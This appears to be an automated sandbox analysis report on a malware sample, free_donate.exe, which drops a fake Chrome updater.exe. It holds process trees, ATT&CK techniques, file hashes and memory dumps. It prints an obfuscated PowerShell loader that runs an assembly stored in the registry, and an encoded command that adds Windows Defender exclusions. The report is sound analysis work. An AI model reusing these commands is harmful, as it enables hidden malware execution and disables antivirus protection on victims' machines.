1⤵
- Loads dropped DLL
PID:624

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1632

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Executes dropped EXE
PID:1080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
3⤵
PID:2740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

Impair Defenses

Modify Registry

Web Service

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\50CD3D75D026C82E2E718570BD6F44D0_60E83F2095C16CA099C94596E7B8AA5D
Filesize
434B

MD5
34098470f7453ce6a77674ff7a5e8dcb

SHA1
ff09fb45f695ee4c6361cc3184aacea2dda51003

SHA256
52e2470e042304bcb07b770a53205b4388109b72286e8c566c458a4318cda6f1

SHA512
eef820aa963fe143fc0bbfadfcadfad8e19efc190f9b50a4081d45e695f57390e15acdcfdbfe3c96483c58853625c584f7287589d3e863ceaa9c480a8020aa64

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
Filesize
416B

MD5
87cd7611069fe941d8dbd6f8a1b994aa

SHA1
1519168cb9e4a8f1272b2cb18f36520e8ae7846b

SHA256
62c13ac7c732ce78494832e4dbb1d7cc02f9743889201bae948c630a93e82d2f

SHA512
7104cdeec3f1de2c14b69a0303d21ddc9fd3cec726adf23ccd4c8ae8fa7e587b174a548e807434fc3364529389d2a79e9a14c4c3bdf9eeacff5e63c6f297542e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4309daba24139726b913efa16d891ff0

SHA1
9f3dd87ae78fcf6f218fec073b6f1d8bf4eab41e

SHA256
522cec007fb9c49f473dc597f6e4bdc1429f9cd05a6a44b2b6648ef813883297

SHA512
b866ebf0d4673538fc018346f7672c661ee8be2a2001b24f2eedd2a4c6083e8133f80a7393db19914af8683ed0617a31e94b121c288249000c23369a5b32460e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04
Filesize
400B

MD5
80f03e24b84dce895f9d658832c9c281

SHA1
079ddf4e425f4ea4a327c60c7b60b355e4159a71

SHA256
9cc7ed9588f7b16888b2f75b42708a6d948206baa1c46579bd6ce7dd8a60a7cb

SHA512
8d1dcb22f58ee87165d886d8555cc9b181984a6682e8ad1ef8fd7ac4bf0b628ec87e1e35ff1ca08b850f64fae27afbf2203efcdb6d94fa72fefd4d1bc1669eee

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565
Filesize
434B

MD5
625b50d1b85b46c4b2b43a14a7ecda29

SHA1
2a42a428bc388d6b11363813c975b95768fad928

SHA256
cfff53c689bc0621c8e88584314a69ee41ce4e11e12fa749d23f52b8ea3d736c

SHA512
96e37695357991ae9bb55153e47a08863b3d0a5ed3ae29e5cee106b4d2470214357a9fdc56c97108c89d58427c2e313379e51da29a8b50211ef6bab3d5edfb17

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
ad0aae95d9a7015ac4f90e88a97ba9b1

SHA1
35c8c7d38a263567e29895ea4cce0f46f4334590

SHA256
3225d151ac8c3f7b2c6166cd2e2c6532ddc1af7e53aa9087ee89aace8b019527

SHA512
ff1abc29f7080bcb518d8c23bec512f41c0d3d29b1b469ee9cf4bdd3356ba90ae2455df6a2e06ceb9419381f4e996b24bb0cd2a15eb95f8968c9be7e37fb1781

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\309axvf\imagestore.dat
Filesize
5KB

MD5
750cfaa6bada5532bd91ba41f8ea512f

SHA1
6bbbb3066cd30f00d038ba9f0543ef04fe0e19b0

SHA256
09e88b8959418212f2d3059707e05be28fe57778ae0b37a18715aaf3356c61f6

SHA512
5a123716f231a41f8a2ee2cac1cc832f685bb97f05d44d1bf19783d6ed7d0bbd7fce4b6d96f2543f7e9a0c1c580f49ddb800469a2a0435e80c8db75c396fdf7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\free_donate.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\free_donate.exe.8ffvnss.partial
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\free_donate[1].exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z4TAQ562\free_donate.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z4TAQ562\free_donate.exe.7ams23l.partial
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\XKX7PNTY.txt
Filesize
608B

MD5
0bdadfd62697c00ae11063b0efcdb3b1

SHA1
ba07e8e50adf6d445ed56742f50b7cfff1e3219a

SHA256
23ceb409b1c110fe8cc190d3fecd1c6f95567660f8353e2c17cd70c54caf9684

SHA512
f7df0437c5410016fda2892edeabe7c8d10818373177a971bfe55d38885c636bb0374aad0427205659bc7b06e78ec118f17ed7a718220c6417698a9cec5055d1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
a3fff9f9a28035b3f6305c73c1f077d1

SHA1
352ab32f2ff3c323628475df4ae73a6ad60770b0

SHA256
b4b69af53da8a3086b92ee97fb56365c4203781e5fa95b5dfdd0fd9ee71028be

SHA512
7d952232deb951fb7ae61af0b448d6041afc249c2ddcd74ec6deb9a9794bd28d80d1222f91611aa74c335de719686624c30ce11a8e86a783d8450b8fea319b5c

Download Submit
C:\Windows\Tasks\dialersvc32.job
Filesize
1KB

MD5
fd2f772caf11563e540621caac9f7793

SHA1
505410509dbc200cafb585028c94e1678e27812f

SHA256
322283ebdc51985c4c9b37b8e39d7a781c526b57c741306bc74ce95ae0ee36ba

SHA512
2c1b8420a3133375cadf32bbdfcb6cc39000bc6feae26ed82702df48edc0f4f8cefc6b7c8cfb929abc36f86ef5817540b768e961aa6094b0c40b95a4f46aa33b

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Program Files\Google\Chrome\updater.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\free_donate.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z4TAQ562\free_donate.exe
Filesize
2.7MB

MD5
5026ed09cc5a093093461066d16a8f30

SHA1
34d60b874d9d3f8841c721692ea1daf31f330653

SHA256
b495d68b0733d071e67e0c30665382decd71885af9bad1c6510ef168e5732cd3

SHA512
2429b9d55af9abe991a182b5fe49548d31986046c3bbacaa4021dd7544752f9b2e0b5c494c989b58daafaaf604e863abe3bd013125068331538618140d67a1f1

Download Submit
memory/240-71-0x0000000000000000-mapping.dmp

Download
memory/272-269-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/272-265-0x0000000000370000-0x000000000039A000-memory.dmp

Filesize
168KB

Download
memory/340-264-0x00000000011F0000-0x000000000121A000-memory.dmp

Filesize
168KB

Download
memory/340-267-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/364-69-0x0000000002974000-0x0000000002977000-memory.dmp

Filesize
12KB

Download
memory/364-66-0x000007FEEDD10000-0x000007FEEE733000-memory.dmp

Filesize
10.1MB

Download
memory/364-64-0x0000000000000000-mapping.dmp

Download
memory/364-67-0x000007FEED1B0000-0x000007FEEDD0D000-memory.dmp

Filesize
11.4MB

Download
memory/364-68-0x0000000002974000-0x0000000002977000-memory.dmp

Filesize
12KB

Download
memory/364-70-0x000000000297B000-0x000000000299A000-memory.dmp

Filesize
124KB

Download
memory/420-164-0x00000000007A0000-0x00000000007C3000-memory.dmp

Filesize
140KB

Download
memory/420-152-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/420-148-0x00000000007A0000-0x00000000007C3000-memory.dmp

Filesize
140KB

Download
memory/420-251-0x00000000007D0000-0x00000000007FA000-memory.dmp

Filesize
168KB

Download
memory/420-151-0x000007FEBE5E0000-0x000007FEBE5F0000-memory.dmp

Filesize
64KB

Download
memory/464-157-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/464-252-0x0000000000150000-0x000000000017A000-memory.dmp

Filesize
168KB

Download
memory/464-155-0x000007FEBE5E0000-0x000007FEBE5F0000-memory.dmp

Filesize
64KB

Download
memory/480-160-0x000007FEBE5E0000-0x000007FEBE5F0000-memory.dmp

Filesize
64KB

Download
memory/480-163-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/480-253-0x0000000000210000-0x000000000023A000-memory.dmp

Filesize
168KB

Download
memory/488-169-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/488-167-0x000007FEBE5E0000-0x000007FEBE5F0000-memory.dmp

Filesize
64KB

Download
memory/488-254-0x00000000001E0000-0x000000000020A000-memory.dmp

Filesize
168KB

Download
memory/516-88-0x0000000000000000-mapping.dmp

Download
memory/588-171-0x000007FEBE5E0000-0x000007FEBE5F0000-memory.dmp

Filesize
64KB

Download
memory/588-173-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/588-255-0x00000000004D0000-0x00000000004FA000-memory.dmp

Filesize
168KB

Download
memory/624-290-0x00000000001D0000-0x00000000001FA000-memory.dmp

Filesize
168KB

Download
memory/664-256-0x00000000002F0000-0x000000000031A000-memory.dmp

Filesize
168KB

Download
memory/664-175-0x000007FEBE5E0000-0x000007FEBE5F0000-memory.dmp

Filesize
64KB

Download
memory/664-177-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/752-181-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/752-257-0x0000000000AC0000-0x0000000000AEA000-memory.dmp

Filesize
168KB

Download
memory/752-180-0x000007FEBE5E0000-0x000007FEBE5F0000-memory.dmp

Filesize
64KB

Download
memory/804-258-0x00000000009E0000-0x0000000000A0A000-memory.dmp

Filesize
168KB

Download
memory/804-185-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/804-183-0x000007FEBE5E0000-0x000007FEBE5F0000-memory.dmp

Filesize
64KB

Download
memory/820-110-0x0000000000000000-mapping.dmp

Download
memory/840-77-0x0000000000000000-mapping.dmp

Download
memory/844-260-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/844-259-0x00000000002B0000-0x00000000002DA000-memory.dmp

Filesize
168KB

Download
memory/860-59-0x000000013F490000-0x000000013F748000-memory.dmp

Filesize
2.7MB

Download
memory/860-89-0x0000000002440000-0x0000000002446000-memory.dmp

Filesize
24KB

Download
memory/860-57-0x0000000000000000-mapping.dmp

Download
memory/860-63-0x000007FEFC591000-0x000007FEFC593000-memory.dmp

Filesize
8KB

Download
memory/860-60-0x0000000000740000-0x0000000000746000-memory.dmp

Filesize
24KB

Download
memory/860-61-0x000000001BF60000-0x000000001C204000-memory.dmp

Filesize
2.6MB

Download
memory/860-62-0x00000000008D0000-0x00000000008D6000-memory.dmp

Filesize
24KB

Download
memory/868-261-0x0000000000A70000-0x0000000000A9A000-memory.dmp

Filesize
168KB

Download
memory/868-262-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/1032-263-0x00000000007C0000-0x00000000007EA000-memory.dmp

Filesize
168KB

Download
memory/1080-122-0x000000013F230000-0x000000013F4E8000-memory.dmp

Filesize
2.7MB

Download
memory/1080-293-0x0000000000E70000-0x0000000000E9A000-memory.dmp

Filesize
168KB

Download
memory/1080-78-0x0000000000000000-mapping.dmp

Download
memory/1080-117-0x0000000000000000-mapping.dmp

Download
memory/1084-112-0x0000000000000000-mapping.dmp

Download
memory/1092-100-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-91-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-101-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-102-0x0000000140001844-mapping.dmp

Download
memory/1092-104-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-106-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-98-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-97-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-96-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-90-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-95-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1092-93-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download
memory/1172-281-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/1172-280-0x00000000004A0000-0x00000000004CA000-memory.dmp

Filesize
168KB

Download
memory/1192-83-0x0000000000000000-mapping.dmp

Download
memory/1204-73-0x0000000000000000-mapping.dmp

Download
memory/1236-272-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/1236-270-0x0000000000440000-0x000000000046A000-memory.dmp

Filesize
168KB

Download
memory/1308-134-0x0000000000000000-mapping.dmp

Download
memory/1308-129-0x0000000000000000-mapping.dmp

Download
memory/1308-125-0x0000000000000000-mapping.dmp

Download
memory/1336-273-0x0000000001BF0000-0x0000000001C1A000-memory.dmp

Filesize
168KB

Download
memory/1336-274-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/1388-277-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/1388-276-0x0000000003E20000-0x0000000003E4A000-memory.dmp

Filesize
168KB

Download
memory/1456-279-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/1456-278-0x00000000008D0000-0x00000000008FA000-memory.dmp

Filesize
168KB

Download
memory/1464-74-0x0000000000000000-mapping.dmp

Download
memory/1516-82-0x0000000000000000-mapping.dmp

Download
memory/1524-72-0x0000000000000000-mapping.dmp

Download
memory/1564-289-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/1564-287-0x0000000000630000-0x000000000065A000-memory.dmp

Filesize
168KB

Download
memory/1584-79-0x0000000000000000-mapping.dmp

Download
memory/1588-84-0x0000000000000000-mapping.dmp

Download
memory/1596-133-0x0000000000000000-mapping.dmp

Download
memory/1596-81-0x0000000000000000-mapping.dmp

Download
memory/1596-124-0x0000000000000000-mapping.dmp

Download
memory/1600-80-0x0000000000000000-mapping.dmp

Download
memory/1624-111-0x0000000000000000-mapping.dmp

Download
memory/1632-297-0x0000000077D50000-0x0000000077ED0000-memory.dmp

Filesize
1.5MB

Download
memory/1632-118-0x0000000076961000-0x0000000076963000-memory.dmp

Filesize
8KB

Download
memory/1632-299-0x00000000713E0000-0x000000007198B000-memory.dmp

Filesize
5.7MB

Download
memory/1632-114-0x0000000000000000-mapping.dmp

Download
memory/1632-250-0x00000000713E0000-0x000000007198B000-memory.dmp

Filesize
5.7MB

Download
memory/1632-275-0x0000000077D50000-0x0000000077ED0000-memory.dmp

Filesize
1.5MB

Download
memory/1676-135-0x0000000000000000-mapping.dmp

Download
memory/1676-127-0x0000000000000000-mapping.dmp

Download
memory/1684-292-0x0000000000320000-0x000000000034A000-memory.dmp

Filesize
168KB

Download
memory/1684-138-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1684-144-0x0000000077B70000-0x0000000077D19000-memory.dmp

Filesize
1.7MB

Download
memory/1684-141-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1684-139-0x00000001400033F4-mapping.dmp

Download
memory/1684-158-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1684-145-0x0000000077A50000-0x0000000077B6F000-memory.dmp

Filesize
1.1MB

Download
memory/1684-162-0x0000000077B70000-0x0000000077D19000-memory.dmp

Filesize
1.7MB

Download
memory/1684-132-0x0000000000000000-mapping.dmp

Download
memory/1696-107-0x0000000000000000-mapping.dmp

Download
memory/1720-108-0x0000000000000000-mapping.dmp

Download
memory/1720-87-0x0000000000000000-mapping.dmp

Download
memory/1732-128-0x0000000000000000-mapping.dmp

Download
memory/1752-358-0x0000000000000000-mapping.dmp

Download
memory/1800-85-0x0000000000000000-mapping.dmp

Download
memory/1824-75-0x0000000000000000-mapping.dmp

Download
memory/1908-76-0x0000000000000000-mapping.dmp

Download
memory/1912-131-0x0000000000000000-mapping.dmp

Download
memory/1912-120-0x0000000000000000-mapping.dmp

Download
memory/1912-109-0x0000000000000000-mapping.dmp

Download
memory/1944-86-0x0000000000000000-mapping.dmp

Download
memory/1988-283-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/1988-282-0x0000000000AB0000-0x0000000000ADA000-memory.dmp

Filesize
168KB

Download
memory/2032-284-0x0000000001DB0000-0x0000000001DDA000-memory.dmp

Filesize
168KB

Download
memory/2032-285-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download
memory/2044-143-0x000000000122B000-0x000000000124A000-memory.dmp

Filesize
124KB

Download
memory/2044-130-0x0000000001224000-0x0000000001227000-memory.dmp

Filesize
12KB

Download
memory/2044-123-0x000007FEEEBF0000-0x000007FEEF613000-memory.dmp

Filesize
10.1MB

Download
memory/2044-126-0x000007FEEE090000-0x000007FEEEBED000-memory.dmp

Filesize
11.4MB

Download
memory/2044-113-0x0000000000000000-mapping.dmp

Download
memory/2044-147-0x0000000077A50000-0x0000000077B6F000-memory.dmp

Filesize
1.1MB

Download
memory/2044-137-0x0000000077A50000-0x0000000077B6F000-memory.dmp

Filesize
1.1MB

Download
memory/2044-142-0x0000000001224000-0x0000000001227000-memory.dmp

Filesize
12KB

Download
memory/2044-136-0x0000000077B70000-0x0000000077D19000-memory.dmp

Filesize
1.7MB

Download
memory/2044-146-0x0000000077B70000-0x0000000077D19000-memory.dmp

Filesize
1.7MB

Download
memory/2160-370-0x0000000000000000-mapping.dmp

Download
memory/2700-307-0x0000000077D50000-0x0000000077ED0000-memory.dmp

Filesize
1.5MB

Download
memory/2700-288-0x00000000004039E0-mapping.dmp

Download
memory/2700-310-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/2740-271-0x0000000000000000-mapping.dmp

Download
memory/2740-314-0x0000000000210000-0x000000000023A000-memory.dmp

Filesize
168KB

Download
memory/2740-308-0x0000000000160000-0x000000000018A000-memory.dmp

Filesize
168KB

Download
memory/2956-309-0x0000000000620000-0x000000000064A000-memory.dmp

Filesize
168KB

Download
memory/2956-311-0x0000000037BB0000-0x0000000037BC0000-memory.dmp

Filesize
64KB

Download